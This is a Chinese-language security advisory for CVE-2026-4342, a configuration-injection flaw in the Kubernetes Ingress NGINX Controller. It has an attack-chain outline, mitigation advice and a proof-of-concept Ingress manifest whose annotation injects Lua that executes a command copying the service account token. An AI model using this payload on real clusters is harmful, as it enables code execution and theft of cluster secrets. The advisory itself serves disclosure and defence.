CVE-2026-4342 CVSS 8.8 高危

CVE-2026-4342 ingress-nginx配置注入致代码执行漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4342

漏洞类型

配置注入导致远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kubernetes Ingress NGINX Controller

漏洞概述

Kubernetes Ingress NGINX Controller 发现严重安全漏洞。攻击者能够通过组合特定的 Ingress 注解，向 nginx 配置中注入恶意指令。这可能导致在 ingress-nginx 控制器的上下文中执行任意代码，并泄露控制器有权访问的所有 Secrets。在默认安装中，控制器拥有全集群 Secrets 的访问权限，因此该漏洞具有极高的风险。

技术细节

该漏洞源于 ingress-nginx 控制器对 Ingress 对象中注解的处理逻辑存在缺陷。攻击者可以通过精心构造的 Ingress YAML 资源文件，组合使用特定的注解字段，从而绕过现有的安全校验机制。这使得攻击者能够将恶意的 Nginx 配置指令直接注入到控制器生成的 nginx.conf 配置文件中。当 Nginx 重新加载配置时，注入的恶意指令将被执行，导致在 ingress-nginx 控制器进程的上下文中实现远程代码执行（RCE）。更为严重的是，在默认安装配置下，ingress-nginx 控制器通常被授予读取集群范围内所有 Secrets 的 RBAC 权限。因此，攻击者利用该漏洞不仅能接管控制器 Pod，还能窃取包括 TLS 证书、数据库密码、API 密钥等在内的所有敏感数据，对集群安全造成毁灭性打击。

攻击链分析

STEP 1

1. 权限获取

攻击者获得在 Kubernetes 集群中创建或修改 Ingress 对象的权限（低权限即可）。

STEP 2

2. 恶意构造

攻击者构造包含特定注解组合的恶意 Ingress YAML 文件，旨在注入 nginx 配置。

STEP 3

3. 注入执行

Ingress-nginx 控制器监听到资源变更，解析注解并将恶意配置写入 nginx.conf，触发 nginx 重载。

STEP 4

4. 代码执行

恶意配置生效，在控制器 Pod 的上下文中执行任意代码。

STEP 5

5. 数据窃取

利用控制器的 RBAC 权限，读取并窃取集群内的敏感 Secrets 信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Malicious Ingress manifest to demonstrate configuration injection
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: malicious-ingress
  namespace: default
  annotations:
    # Example annotation injecting a Lua script to execute commands
    nginx.ingress.kubernetes.io/configuration-snippet: |
      rewrite_by_lua_block {
        local os = require "os"
        os.execute("cat /var/run/secrets/kubernetes.io/serviceaccount/token > /tmp/stolen_token")
      }
spec:
  rules:
  - host: malicious.example.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: legitimate-service
            port:
              number: 80

影响范围

ingress-nginx controller (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施

建议立即升级 ingress-nginx controller 到最新版本以修复此漏洞。如果不能立即升级，应严格限制非管理员用户创建或修改 Ingress 资源的权限，并部署网络策略或准入控制策略（如 ValidatingAdmissionPolicy）来禁止使用高危注解（如 configuration-snippet），防止配置注入攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表